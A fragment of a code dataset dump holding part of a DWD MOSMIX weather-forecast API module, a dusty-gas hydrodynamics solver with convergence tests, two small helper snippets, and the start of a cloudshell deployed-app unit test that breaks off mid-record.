url\n except IndexError as e:\n raise IndexError(f\"Unable to find LATEST file within {url}\") from e\n\n df_urls = pd.DataFrame({\"URL\": urls})\n\n df_urls[DwdColumns.DATE.value] = df_urls[\"URL\"].apply(\n lambda url_: url_.split(\"/\")[-1].split(\"_\")[2].replace(\".kmz\", \"\")\n )\n\n df_urls = df_urls[df_urls[DwdColumns.DATE.value] != \"LATEST\"]\n\n df_urls[DwdColumns.DATE.value] = pd.to_datetime(\n df_urls[DwdColumns.DATE.value], format=DatetimeFormat.YMDH.value\n )\n\n df_urls = df_urls.loc[df_urls[DwdColumns.DATE.value] == date]\n\n if df_urls.empty:\n raise IndexError(f\"Unable to find {date} file within {url}\")\n\n return df_urls[\"URL\"].item()\n\n\nclass DwdMosmixRequest(ScalarRequestCore):\n \"\"\" Implementation of sites for MOSMIX forecast sites \"\"\"\n\n provider = Provider.DWD\n kind = Kind.FORECAST\n\n _url = (\n \"https://www.dwd.de/DE/leistungen/met_verfahren_mosmix/\"\n \"mosmix_stationskatalog.cfg?view=nasPublication\"\n )\n\n _colspecs = [\n (0, 5),\n (6, 11),\n (12, 17),\n (18, 22),\n (23, 44),\n (45, 51),\n (52, 58),\n (59, 64),\n (65, 71),\n (72, 76),\n ]\n\n _columns = [\n Columns.STATION_ID.value,\n Columns.ICAO_ID.value,\n Columns.FROM_DATE.value,\n Columns.TO_DATE.value,\n Columns.HEIGHT.value,\n Columns.LATITUDE.value,\n Columns.LONGITUDE.value,\n Columns.NAME.value,\n Columns.STATE.value,\n ]\n\n _tz = Timezone.GERMANY\n _parameter_base = DwdMosmixParameter\n _values = DwdMosmixValues\n\n _resolution_type = ResolutionType.FIXED\n _resolution_base = Resolution # use general Resolution for fixed Resolution\n _period_type = PeriodType.FIXED\n _period_base = None\n _data_range = DataRange.FIXED\n _has_datasets = True\n _dataset_tree = DwdMosmixParameter\n _unique_dataset = True\n _dataset_base = DwdMosmixDataset\n\n _unit_tree = DwdMosmixUnit\n\n @property\n def _dataset_accessor(self) -> str:\n \"\"\"\n\n :return:\n \"\"\"\n return self.mosmix_type.name\n\n @classmethod\n def _setup_discover_filter(cls, filter_):\n \"\"\"\n Use SMALL and LARGE instead of resolution, which is fixed for Mosmix\n\n :param filter_:\n :return:\n \"\"\"\n filter_ = pd.Series(filter_).apply(\n parse_enumeration_from_template, 
args=(cls._dataset_base,)\n ).tolist() or [*cls._dataset_base]\n\n return filter_\n\n _base_columns = [\n Columns.STATION_ID.value,\n Columns.ICAO_ID.value,\n Columns.FROM_DATE.value,\n Columns.TO_DATE.value,\n Columns.HEIGHT.value,\n Columns.LATITUDE.value,\n Columns.LONGITUDE.value,\n Columns.NAME.value,\n Columns.STATE.value,\n ]\n\n @staticmethod\n def adjust_datetime(datetime_: datetime) -> datetime:\n \"\"\"\n Adjust datetime to MOSMIX release frequency, which is required for MOSMIX-L\n that is only released every 6 hours (3, 9, 15, 21). The datetime is floored\n to the closest release time, e.g. if the hour is 14, it will be floored to 9\n\n :param datetime_: datetime that is adjusted\n :return: adjusted datetime with floored hour\n \"\"\"\n regular_date = datetime_ + pd.offsets.DateOffset(hour=3)\n\n if regular_date > datetime_:\n regular_date -= pd.Timedelta(hours=6)\n\n delta_hours = (datetime_.hour - regular_date.hour) % 6\n\n datetime_adjusted = datetime_ - pd.Timedelta(hours=delta_hours)\n\n return datetime_adjusted\n\n def __init__(\n self,\n parameter: Optional[Tuple[Union[str, DwdMosmixParameter], ...]],\n mosmix_type: Union[str, DwdMosmixType],\n start_issue: Optional[\n Union[str, datetime, DwdForecastDate]\n ] = DwdForecastDate.LATEST,\n end_issue: Optional[Union[str, datetime]] = None,\n start_date: Optional[Union[str, datetime]] = None,\n end_date: Optional[Union[str, datetime]] = None,\n humanize: bool = True,\n tidy: bool = True,\n si_units: bool = True,\n ) -> None:\n \"\"\"\n\n :param parameter: parameter(s) to be collected\n :param mosmix_type: mosmix type, either small or large\n :param start_issue: start of issue of mosmix which should be caught\n (Mosmix run at time XX:YY)\n :param end_issue: end of issue\n :param start_date: start date for filtering returned dataframe\n :param end_date: end date\n :param humanize: humanize parameter names\n :param tidy: tidy data to be row-wise\n :param si_units: convert to si units\n \"\"\"\n self.mosmix_type = parse_enumeration_from_template(mosmix_type, DwdMosmixType)\n\n super().__init__(\n parameter=parameter,\n start_date=start_date,\n end_date=end_date,\n resolution=Resolution.HOURLY,\n period=Period.FUTURE,\n si_units=si_units,\n )\n\n if not start_issue:\n start_issue = DwdForecastDate.LATEST\n\n try:\n start_issue = parse_enumeration_from_template(start_issue, DwdForecastDate)\n except InvalidParameter:\n pass\n\n # Parse issue date if not set to fixed \"latest\" string\n if start_issue is DwdForecastDate.LATEST and end_issue:\n log.info(\n \"end_issue will be ignored as 'latest' was selected for issue date\"\n )\n\n if start_issue is not DwdForecastDate.LATEST:\n if not start_issue and not end_issue:\n start_issue = DwdForecastDate.LATEST\n elif not end_issue:\n end_issue = start_issue\n elif not start_issue:\n start_issue = end_issue\n\n start_issue = pd.to_datetime(start_issue, infer_datetime_format=True).floor(\n \"1H\"\n )\n end_issue = pd.to_datetime(end_issue, infer_datetime_format=True).floor(\n \"1H\"\n )\n\n # Shift start date and end date to 3, 9, 15, 21 hour format\n if self.mosmix_type == DwdMosmixType.LARGE:\n start_issue = self.adjust_datetime(start_issue)\n end_issue = self.adjust_datetime(end_issue)\n\n # TODO: this should be replaced by the freq property in the main class\n if self.mosmix_type == DwdMosmixType.SMALL:\n self.resolution = Resolution.HOURLY\n else:\n self.resolution = Resolution.HOUR_6\n\n self.start_issue = start_issue\n self.end_issue = end_issue\n self.humanize = humanize\n self.tidy = tidy\n\n
@property\n def issue_start(self):\n \"\"\" Required for typing \"\"\"\n return self.start_issue\n\n @property\n def issue_end(self):\n \"\"\" Required for typing \"\"\"\n return self.end_issue\n\n @metaindex_cache.cache_on_arguments()\n def _all(self) -> pd.DataFrame:\n \"\"\"\n Create meta data DataFrame from available station list\n\n :return:\n \"\"\"\n # TODO: Cache payload with FSSPEC\n payload = requests.get(self._url, headers={\"User-Agent\": \"\"})\n\n df = pd.read_fwf(\n StringIO(payload.text),\n skiprows=4,\n skip_blank_lines=True,\n colspecs=self._colspecs,\n na_values=[\"----\"],\n header=None,\n dtype=\"str\",\n )\n\n df = df[\n (df.iloc[:, 0] != \"=====\")\n & (df.iloc[:, 0] != \"TABLE\")\n & (df.iloc[:, 0] != \"clu\")\n ]\n\n df = df.iloc[:, [2, 3, 4, 5, 6, 7]]\n\n df.columns = [\n Columns.STATION_ID.value,\n Columns.ICAO_ID.value,\n Columns.NAME.value,\n Columns.LATITUDE.value,\n Columns.LONGITUDE.value,\n Columns.HEIGHT.value,\n ]\n\n # Convert coordinates from degree minutes to decimal degrees\n df[Columns.LATITUDE.value] = (\n df[Columns.LATITUDE.value].astype(float).apply(convert_dm_to_dd)\n )\n\n df[Columns.LONGITUDE.value] = (\n df[Columns.LONGITUDE.value].astype(float).apply(convert_dm_to_dd)\n )\n\n df = df.reindex(columns=self._columns)\n\n return df\n","sub_path":"wetterdienst/provider/dwd/forecast/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":18033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
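A standalone sketch of the issue-time flooring that adjust_datetime above performs for MOSMIX-L (runs at 03, 09, 15 and 21 UTC); only pandas is required, and the sample timestamp is arbitrary.

import pandas as pd
from datetime import datetime

def floor_to_mosmix_l_run(dt: datetime) -> datetime:
    # Anchor at 03:00 of the same day, step back 6 h if that lies in the future,
    # then subtract the remaining offset modulo the 6-hour cycle.
    regular = dt + pd.offsets.DateOffset(hour=3)
    if regular > dt:
        regular -= pd.Timedelta(hours=6)
    return dt - pd.Timedelta(hours=(dt.hour - regular.hour) % 6)

print(floor_to_mosmix_l_run(datetime(2021, 5, 1, 14)))  # 2021-05-01 09:00:00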
+{"seq_id":"297667675","text":"from __future__ import print_function\nimport numpy as np\n\nfrom HLLC import HLLC\nfrom dustywave_sol import DustyWaveSolver\n\nGAMMA = 5/3.\nNHYDRO = 5\n\ni_rho_g = 0\ni_vel_g = 1\ni_pre_g = 2\n\ni_rho_d = 3\ni_vel_d = 4\n\nK = 10000.0\n\n\nFB = 1.0\n\ndef prim2cons(W):\n U = np.full((len(W), NHYDRO), np.nan) #conserved state vector\n # Gas\n U[:,0] = W[:,0] # density\n U[:,1] = W[:,0]*W[:,1] # momentum\n U[:,2] = W[:,2]/(GAMMA-1) + (W[:,0]*W[:,1]**2)/2 # energy\n # Dust\n U[:,3] = W[:,3] # density\n U[:,4] = W[:,3]*W[:,4] # momentum\n return(U)\n\t\ndef cons2prim(U):\n W = np.full((len(U), NHYDRO), np.nan) #primitive state vector\n # Gas\n W[:,0] = U[:,0] # density\n W[:,1] = U[:,1]/U[:,0] # velocity\n W[:,2] = (GAMMA-1)*(U[:,2] - (U[:,1]**2/U[:,0])/2)\t# pressure\n # Dust\n W[:,3] = U[:,3] # density\n W[:,4] = U[:,4]/U[:,3] # velocity\n return(W)\n\t\ndef prim2flux(W):\n F = np.full((len(W), NHYDRO), np.nan)\n # Gas\n F[:,0] = W[:,0]*W[:,1] # mass \n F[:,1] = W[:,0]*W[:,1]**2 + W[:,2] # momentum \n F[:,2] = W[:,1]*(W[:,2]/(GAMMA-1) + (W[:,0]*W[:,1]**2)/2 + W[:,2]) # energy\n # Dust\n F[:,3] = W[:,3]*W[:,4] # mass \n F[:,4] = W[:,3]*W[:,4]**2 # momentum \n return(F)\n\n\ndef compute_gradients(xc, xe, Q):\n Qm = Q[:-2]\n Q0 = Q[1:-1]\n Qp = Q[2:]\n\n dx = xc[2:] - xc[:-2]\n\n Qmax = np.maximum(np.maximum(Qp, Qm), Q0)\n Qmin = np.minimum(np.minimum(Qp, Qm), Q0)\n\n grad = (Qp - Qm) / dx.reshape(-1,1)\n\n dQ = grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Qp = Q0 + dQ\n\n pos = Qp > Qmax ; neg = Qp < Qmin\n with np.errstate(all='ignore'):\n phir = np.where(pos, (Qmax - Q0)/dQ, np.where(neg, (Qmin - Q0)/dQ, 1))\n \n dQ = grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n Qm = Q0 + dQ\n \n pos = Qm > Qmax ; neg = Qm < Qmin\n with np.errstate(all='ignore'):\n phil = np.where(pos, (Qmax - Q0)/dQ, np.where(neg, (Qmin - Q0)/dQ, 1))\n\n alpha = np.maximum(0, np.minimum(1, np.minimum(phir, phil)))\n grad *= alpha\n\n return grad\n\n\ndef compute_time_diff_W(W, gradW, vframe):\n \n dWdt = np.zeros_like(W)\n\n rho_g = W[:, i_rho_g]\n grad_rho_g = gradW[:, i_rho_g]\n \n v_g = W[:, i_vel_g] - vframe\n grad_v_g = gradW[:, i_vel_g]\n\n P = W[:, i_pre_g]\n grad_P = gradW[:, i_pre_g]\n\n dWdt[:,i_rho_g] = - v_g*grad_rho_g - rho_g *grad_v_g\n dWdt[:,i_vel_g] = - v_g *grad_v_g - (1/rho_g)*grad_P\n dWdt[:,i_pre_g] = - GAMMA*P*grad_v_g - v_g *grad_P\n\n rho_d = W[:, i_rho_d]\n grad_rho_d = gradW[:, i_rho_d]\n\n v_d = W[:, i_vel_d] - vframe\n grad_v_d = gradW[:, i_vel_d]\n\n dWdt[:,i_rho_d] = - v_d*grad_rho_d - rho_d *grad_v_d\n dWdt[:,i_vel_d] = - v_d *grad_v_d \n\n return dWdt\n\ndef wrapflux_moving_mesh(riemann):\n \n def compute_flux(WL, WR, vf):\n WL, WR = WL.copy(), WR.copy()\n\n WL[:,1] -= vf ; WR[:,1] -= vf\n WL[:,4] -= vf ; WR[:,4] -= vf\n\n flux = riemann(WL, WR)\n \n flux[:,2] += 0.5*flux[:,0]*vf**2 + flux[:,1]*vf\n flux[:,1] += flux[:,0]*vf\n\n flux[:,4] += flux[:,3]*vf\n\n return flux\n\n return compute_flux\n\ndef dust_solver(WL, WR):\n \"\"\"Solve the Riemann Problem for dust\"\"\"\n\n # Compute the conserved quantities\n UL = np.full([len(WL), 2], np.nan)\n UL[:,0] = WL[:,i_rho_d]\n UL[:,1] = WL[:,i_rho_d]*WL[:,i_vel_d]\n\n UR = np.full([len(WR), 2], np.nan)\n UR[:,0] = WR[:,i_rho_d]\n UR[:,1] = WR[:,i_rho_d]*WR[:,i_vel_d]\n\n fL = UL*WL[:,4].reshape(-1,1)\n fR = UR*WR[:,4].reshape(-1,1)\n\n # Upwind the advection\n f_dust = np.zeros_like(UL)\n f_dust[(WL[:,4] > 0)] += fL[(WL[:,4] > 0)]\n f_dust[(WR[:,4] < 0)] += fR[(WR[:,4] < 0)]\n\n # Dust signal speed: Roe-average\n #R = 
np.sqrt(WL[:,3]/WR[:,3])\n #f = R /(1 + R)\n\n #Sd = (f*WL[:,4] + (1-f)*WR[:,4]).reshape(-1,1)\n #f_dust = Sd*np.where(Sd > 0, UL, UR)\n\n return f_dust\n\n@wrapflux_moving_mesh\ndef HLL_solver(WL, WR):\n UL = prim2cons(WL)\n UR = prim2cons(WR)\n \n fL = prim2flux(WL)\n fR = prim2flux(WR)\n \n csl = np.sqrt(GAMMA*WL[:,2]/WL[:,0])\n csr = np.sqrt(GAMMA*WR[:,2]/WR[:,0])\n \n Sm = (WL[:,1] - csl).reshape(-1,1)\n Sp = (WR[:,1] + csr).reshape(-1,1)\n\n \n # HLL central state\n fHLL = (Sp*fL - Sm*fR + Sp*Sm*(UR - UL)) / (Sp - Sm)\n\n # Left / Right states\n indexL = Sm.reshape(-1) >= 0\n indexR = Sp.reshape(-1) <= 0\n fHLL[indexL] = fL[indexL]\n fHLL[indexR] = fR[indexR]\n\n # Overwrite the dust flux\n fHLL[:,3:] = dust_solver(WL, WR)\n\t \n return fHLL\n\n_HLLC = HLLC(gamma=GAMMA)\n@wrapflux_moving_mesh\ndef HLLC_solver(WL, WR):\n UL, UR = prim2cons(WL), prim2cons(WR)\n flux_HLLC = _HLLC(UL[:,:3].T, UR[:,:3].T)\n\n flux = np.zeros_like(WL)\n flux[:,:3] = flux_HLLC.T\n flux[:,3:] = dust_solver(WL, WR)\n\n return flux\n\n\ndef max_wave_speed(U, vf):\n W = cons2prim(U)\n return np.maximum(np.abs(W[:,1]-vf) + np.sqrt(GAMMA*W[:,2]/W[:,0]), \n np.abs(W[:,4]-vf))\n\n \ndef solve_euler(Npts, IC, tout, Ca = 0.7, lagrangian=False, HLLC=True):\n \"\"\"Test schemes using an Explicit TVD RK integration\"\"\"\n # Setup up the grid\n stencil = 2\n \n xe = np.linspace(0.0, 1.0, Npts+1)\n xc = 0.5*(xe[1:] + xe[:-1])\n\n def boundary(xc, Q):\n # Add periodic boundaries to Q\n Qb = np.empty([Npts+2*stencil, NHYDRO])\n Qb[stencil:-stencil] = Q\n Qb[ :stencil] = Qb[Npts:Npts+stencil]\n Qb[-stencil:] = Qb[stencil:2*stencil]\n\n # Add periodic boundaries for cell centres and compute interfaces\n xc_b = np.empty(Npts+2*(stencil+1))\n xc_b[(stencil+1):-(stencil+1)] = xc\n xc_b[ :(stencil+1)] = xc[-(stencil+1):] - 1\n xc_b[-(stencil+1):] = xc[ :(stencil+1)] + 1\n\n xe = 0.5*(xc_b[1:] + xc_b[:-1])\n xc_b = xc_b[1:-1]\n\n return xc_b, xe, Qb\n\n def RK2_prim(xc_in, Q, dt):\n #1. Apply Boundaries\n xc, xe, Qb = boundary(xc_in, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #2. Compute Primitive variables\n Ub = Qb / dx\n Wb = cons2prim(Ub)\n\n #3. Compute gradients\n grad = compute_gradients(xc, xe, Wb)\n\n #4. Set interface velocities:\n if lagrangian:\n vc = Wb[:,1].copy()\n else:\n vc = np.zeros_like(Wb[:,1])\n f = (xe[1:-1] - xc[:-1]) / (xc[1:]-xc[:-1])\n vf = f*vc[1:] + (1-f)*vc[:-1]\n\n #5. Compute edge states:\n Wp = Wb[1:-1] + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Wb[1:-1] + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #6. Compute first fluxes:\n if HLLC:\n flux_0 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_0 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #7. Move the mesh and compute new face locations:\n xc = xc_in + vc[stencil:-stencil]*dt\n xc, xe, _ = boundary(xc, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #8. Predict edge states at t+dt\n # 8a. First predict the mid-points at t+dt\n dWdt = compute_time_diff_W(Wb[1:-1], grad, vc[1:-1]) \n Ws0 = Wb[1:-1] + dt*dWdt\n Ws = Wb[1:-1] + dt*dWdt\n\n # 8b. Apply the drag forces using Exponential Euler method\n rho = Ws[:,0] + FB*Ws[:,3]\n \n v_com = (Ws[:,0]*Ws[:,1] + FB*Ws[:,3]*Ws[:,4])/rho\n dV = (Wb[1:-1,4] - Wb[1:-1,1]) * np.exp(-K*rho*dt) \n da = (dWdt[:,4] - dWdt[:,1]) *-np.expm1(-dt*K*rho)/(K*rho)\n\n Ws[:,1] = v_com - FB*Ws[:,3]*(dV + da)/rho\n Ws[:,4] = v_com + Ws[:,0]*(dV + da)/rho\n \n # Heating due to drag\n dEk = 0.5*(Ws[:,0]*Ws[:,1]**2 - Ws0[:,0]*Ws0[:,1]**2 +\n Ws[:,3]*Ws[:,4]**2 - Ws0[:,3]*Ws0[:,4]**2)\n Ws[:,2] -= dEk * (GAMMA-1)\n \n # 8c. 
Reconstruct the edge states\n Wp = Ws + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Ws + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #9. Compute second fluxes\n if HLLC:\n flux_1 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_1 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #10. Compute the drag terms using 2nd order exponential Runge-Kutta method.\n f_g0 = -np.diff(flux_0[:,1]) ; f_g1 = -np.diff(flux_1[:,1])\n f_d0 = -np.diff(flux_0[:,4]) ; f_d1 = -np.diff(flux_1[:,4])\n\n Qn = Q - 0.5*dt*np.diff(flux_0 + flux_1, axis=0) \n\n m_com = Qn[:,1] + FB*Qn[:,4]\n \n rho = Qn[:,0] + FB*Qn[:,3]\n eps_g = Qn[:,0] / rho ; eps_d = Qn[:,3] / rho\n rho /= np.diff(xe[stencil:-stencil])\n\n df = (eps_g*(f_d0+f_d1) - eps_d*(f_g0+f_g1)) / 2\n\n dm = (eps_g*Q[:,4] - eps_d*Q[:,1]) * np.exp(-K*rho*dt) \n dm += df *-np.expm1(-dt*K*rho)/(K*rho)\n \n m_d = eps_d * m_com + dm\n m_g = eps_g * m_com - dm*FB\n\n #11. Update Conserved quantities\n Q[:] = Qn\n\n Q[:,1] = m_g\n Q[:,4] = m_d\n\n # Heating due to drag to conserve energy\n if FB:\n Q[:,2] -= 0.5*(Q[:,4]**2 - Qn[:,4]**2) / Q[:,3]\n \n\n # Return\n xc = xc[stencil:-stencil]\n xe = xe[stencil:-stencil]\n\n return xc, xe, Q\n\n # Set the initial conditions\n dx = np.diff(xe).reshape(-1,1)\n W = IC(xe)\n U = prim2cons(W)\n Q = U * dx\n\n t = 0\n while t < tout:\n\n U = Q/dx\n\n vf = 0\n if lagrangian:\n vf = U[:,1] / U[:,0]\n dtmax = Ca * np.min(dx / max_wave_speed(U, vf))\n dt = min(dtmax, tout-t)\n\n xc, xe, Q = RK2_prim(xc, Q, dt)\n dx = np.diff(xe).reshape(-1,1)\n \n t = min(tout, t+dt)\n \n\n return xc, xe, cons2prim(Q/dx)\n \ndef _test_convergence(IC, pmin=3, pmax=9, t_final=3.0,\n figs_evol=None, fig_err=None):\n\n N = 2**np.arange(pmin, pmax+1)\n for lagrangian in [True, False]:\n err_gas = []\n err_dust = []\n c=None\n if lagrangian:\n scheme = label='Moving'\n ls = '-'\n else:\n scheme = label='Fixed'\n ls = '--'\n print (label)\n for Ni in N:\n print ('\\t', Ni)\n x, xe, W = solve_euler(Ni, IC, t_final, Ca = 0.4, \n lagrangian=lagrangian)\n\n if figs_evol is not None:\n figs_evol[0].plot(x, W[:,0], ls=ls, label=str(Ni))\n figs_evol[1].plot(x, W[:,1], ls=ls)\n figs_evol[2].plot(x, W[:,2], ls=ls)\n figs_evol[3].plot(x, W[:,3], ls=ls)\n figs_evol[4].plot(x, W[:,4], ls=ls)\n \n figs_evol[0].set_ylabel('Density')\n figs_evol[1].set_ylabel('Velocity')\n figs_evol[2].set_ylabel('Pressure')\n figs_evol[3].set_ylabel('Dust Density')\n figs_evol[4].set_ylabel('Dust Velocity')\n\n figs_evol[2].set_xlabel('x')\n\n label=None\n \n err = W - IC(x, t=t_final)\n err_gas.append(np.sqrt(np.mean(err[:,1]**2)))\n err_dust.append(np.sqrt(np.mean(err[:,4]**2)))\n if fig_err is not None:\n c = fig_err.loglog(N, err_gas, c=c, ls='-', \n label=scheme)[0].get_color()\n fig_err.loglog(N, err_dust, c=c, ls='--')\n\n if fig_err is not None:\n fig_err.set_xlabel('N')\n fig_err.set_ylabel('L2 velocity error')\n fig_err.plot(N, 1e-4/N**2, label='1/N^2', c='k')\n fig_err.legend()\n if figs_evol is not None:\n W = IC(x, t=t_final)\n figs_evol[0].plot(x, W[:,0], ls=':', c='k', label='Exact')\n figs_evol[1].plot(x, W[:,1], ls=':', c='k')\n figs_evol[2].plot(x, W[:,2], ls=':', c='k')\n figs_evol[3].plot(x, W[:,3], ls=':', c='k')\n figs_evol[4].plot(x, W[:,4], ls=':', c='k')\n figs_evol[0].legend(loc='best',frameon=False, ncol=2)\n\n\ndef init_wave(xe, cs0=1.0, rho0=1.0, v0=1.0, drho=1e-6, t=0):\n\n if t == 0:\n kx = 2*np.pi*(xe + (v0-cs0)*t) \n\n W = np.full([len(xe)-1, NHYDRO], np.nan)\n W[:,0] = rho0 - drho*np.diff(np.cos(kx)) / np.diff(kx)\n W[:,1] = v0 - 
drho*cs0*np.diff(np.cos(kx)) / np.diff(kx)\n W[:,2] = (rho0*cs0**2/GAMMA) * (W[:,0]/rho0)**GAMMA\n\n W[:,3] = W[:,0]\n W[:,4] = W[:,1]\n\n else:\n sol = DustyWaveSolver(K=K,delta=drho,vf=v0,GAMMA=GAMMA,feedback=FB)(t)\n\n x = xe\n W = np.full([len(x), NHYDRO], np.nan)\n\n W[:,0] = sol.rho_gas(x)\n W[:,1] = sol.v_gas(x)\n W[:,2] = sol.P(x)\n W[:,3] = sol.rho_dust(x)\n W[:,4] = sol.v_dust(x)\n\n return W\n\n\ndef _run_and_plot_sod(Nx=256, t_final=0.1):\n f, subs = plt.subplots(5, 1)\n \n IC = init_sod\n\n # Lagrangian\n for HLLC in [True, False]:\n if HLLC:\n c = 'b'\n C = 'C'\n else:\n c = 'g'\n C = ''\n x, xe, W = solve_euler(Nx, IC, t_final, Ca = 0.4, \n lagrangian=True, HLLC=HLLC)\n x -= 0.5\n \n\n subs[0].plot(x, W[:,0], c=c, label='Moving, HLL'+C)\n subs[1].plot(x, W[:,1], c=c, )\n subs[2].plot(x, W[:,2], c=c, )\n subs[3].plot(x, W[:,3], c=c, )\n subs[4].plot(x, W[:,4], c=c, )\n\n # Fixed\n x, xe, W = solve_euler(Nx, IC, t_final, Ca = 0.4, \n lagrangian=False, HLLC=HLLC)\n x -= 0.5\n\n subs[0].plot(x, W[:,0], c=c, ls='--', label='Fixed, HLL'+C)\n subs[1].plot(x, W[:,1], c=c, ls='--')\n subs[2].plot(x, W[:,2], c=c, ls='--')\n subs[3].plot(x, W[:,3], c=c, ls='--')\n subs[4].plot(x, W[:,4], c=c, ls='--')\n \n # Add IC:\n W = IC(xe)\n subs[0].plot(x, W[:,0], c='k', label='IC')\n subs[1].plot(x, W[:,1], c='k')\n subs[2].plot(x, W[:,2], c='k')\n subs[3].plot(x, W[:,3], c='k')\n subs[4].plot(x, W[:,4], c='k')\n \n\n subs[0].set_ylabel('Density')\n subs[1].set_ylabel('Velocity')\n subs[2].set_ylabel('Pressure')\n subs[3].set_ylabel('Dust Density')\n subs[4].set_ylabel('Dust Velocity')\n\n subs[4].set_xlabel('x')\n\n subs[0].legend(loc='best')\n\n subs[0].set_xlim(0, 0.5)\n subs[1].set_xlim(0, 0.5)\n subs[2].set_xlim(0, 0.5)\n subs[3].set_xlim(0, 0.5)\n subs[4].set_xlim(0, 0.5)\n\n subs[1].set_ylim(-0.1, 0.7)\n\ndef init_sod(xe):\n Pl = 1.0\n rhol = 1.0\n vl = 0.0\n\n Pr = 0.1975\n rhor = 0.25\n vr = 0\n\n xc = 0.5*(xe[1:] + xe[:-1])\n idx = (0.25 < xc) & (xc <= 0.75)\n \n W = np.full([len(xc), NHYDRO], np.nan)\n\n W[idx, 0] = rhol\n W[idx, 1] = vl\n W[idx, 2] = Pl\n\n W[~idx, 0] = rhor\n W[~idx, 1] = vr\n W[~idx, 2] = Pr\n\n W[:,3] = W[:,0]\n W[:,4] = W[:,1]\n\n return W\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n np.seterr(invalid='raise')\n _test_convergence(init_wave, \n figs_evol=plt.subplots(5, 1)[1],\n fig_err=plt.subplots(1)[1])\n\n #_run_and_plot_sod()\n\n plt.show()\n \n","sub_path":"working_backwards/solve_dusty_euler_mm_mid.py","file_name":"solve_dusty_euler_mm_mid.py","file_ext":"py","file_size_in_byte":14999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
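A round-trip check one might keep alongside the converters above: prim2cons followed by cons2prim must reproduce the primitive state. The single-cell gas state below is arbitrary test data, restated in scalar form so the check runs without the rest of the module.

import numpy as np

GAMMA = 5 / 3.

def prim2cons_gas(rho, v, P):
    # density, momentum and total energy, mirroring rows 0-2 of prim2cons()
    return rho, rho * v, P / (GAMMA - 1) + 0.5 * rho * v ** 2

def cons2prim_gas(rho, mom, E):
    v = mom / rho
    return rho, v, (GAMMA - 1) * (E - 0.5 * rho * v ** 2)

rho, v, P = 1.2, 0.3, 0.9
assert np.allclose(cons2prim_gas(*prim2cons_gas(rho, v, P)), (rho, v, P))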
+{"seq_id":"260630567","text":"import json\nfrom unittest.mock import Mock\n\nfrom cloudshell.shell.core.driver_context import AppContext, ResourceContextDetails\n\nfrom cloudshell.cp.core.request_actions import DeployedVMActions\nfrom cloudshell.cp.core.request_actions.models import DeployedApp\n\n\nclass StaticApp(DeployedApp):\n DEPLOYMENT_PATH = \"Generic Static vCenter VM 2G\"\n\n\nclass MyDeployedApp(DeployedApp):\n DEPLOYMENT_PATH = \"MicrosoftAzure2G.AzureVMFromMarketplace2G\"\n\n\ndef test_static_deployed_app():\n app_name = \"win-test\"\n address = \"192.168.26.43\"\n uuid = \"42282856-0637-216a-511d-ccd88aa07e8f\"\n vm_name = \"static-vms/win-test\"\n app_context = AppContext(\n app_request_json=\"\",\n deployed_app_json=json.dumps(\n {\n \"name\": app_name,\n \"family\": \"CS_GenericAppFamily\",\n \"model\": StaticApp.DEPLOYMENT_PATH,\n \"address\": address,\n \"attributes\": [\n {\n \"name\": f\"{StaticApp.DEPLOYMENT_PATH}.VM Name\",\n \"value\": \"static-vms/win-test\",\n },\n {\n \"name\": f\"{StaticApp.DEPLOYMENT_PATH}.vCenter Resource Name\",\n \"value\": \"vcenter\",\n },\n {\"name\": f\"{StaticApp.DEPLOYMENT_PATH}.User\", \"value\": \"\"},\n {\"name\": f\"{StaticApp.DEPLOYMENT_PATH}.Password\", \"value\": \"\"},\n {\"name\": f\"{StaticApp.DEPLOYMENT_PATH}.Public IP\", \"value\": \"\"},\n {\"name\": \"Execution Server Selector\", \"value\": \"\"},\n ],\n \"vmdetails\": {\n \"id\": \"8b6c4c4d-e2c9-47c9-b260-9a33688bf78a\",\n \"cloudProviderId\": \"d4d679c6-3049-4e55-9e64-8692a3400b6a\",\n \"uid\": uuid,\n \"vmCustomParams\": [],\n },\n }\n ),\n )\n resource = ResourceContextDetails(\n id=\"0917eb75-92ad-4291-9623-4235c81be76b\",\n name=app_name,\n fullname=app_name,\n type=\"Resource\",\n address=address,\n model=StaticApp.DEPLOYMENT_PATH,\n family=\"CS_GenericAppFamily\",\n description=None,\n attributes={\n \"Generic Static vCenter VM 2G.VM Name\": vm_name,\n \"Generic Static vCenter VM 2G.vCenter Resource Name\": \"vcenter\",\n \"Generic Static vCenter VM 2G.User\": \"\",\n \"Generic Static vCenter VM 2G.Password\": \"3M3u7nkDzxWb0aJ/IZYeWw==\",\n \"Generic Static vCenter VM 2G.Public IP\": \"\",\n \"Execution Server Selector\": \"\",\n },\n app_context=app_context,\n networks_info=None,\n shell_standard=None,\n shell_standard_version=None,\n )\n\n DeployedVMActions.register_deployment_path(StaticApp)\n actions = DeployedVMActions.from_remote_resource(resource, Mock())\n\n app = actions.deployed_app\n assert isinstance(app, StaticApp)\n assert app.name == app_name\n assert app.model == app.deployment_service_model == StaticApp.DEPLOYMENT_PATH\n assert app.private_ip == address\n assert app.vmdetails.uid == uuid\n assert app.attributes[f\"{StaticApp.DEPLOYMENT_PATH}.VM Name\"] == vm_name\n\n\ndef test_deployed_app():\n app_name = \"Azureubuntusimple\"\n address = \"10.0.1.3\"\n deployed_model = \"Generic App Model\"\n uuid = \"3d750874-09f1-4243-a598-6700bb648655\"\n\n app_context = AppContext(\n app_request_json=json.dumps(\n {\n \"name\": app_name,\n \"description\": None,\n \"logicalResource\": {\n \"family\": \"GenericAppFamily\",\n \"model\": \"GenericAppModel\",\n \"driver\": None,\n \"description\": \"\",\n \"attributes\": [\n {\"name\": \"Password\", \"value\": 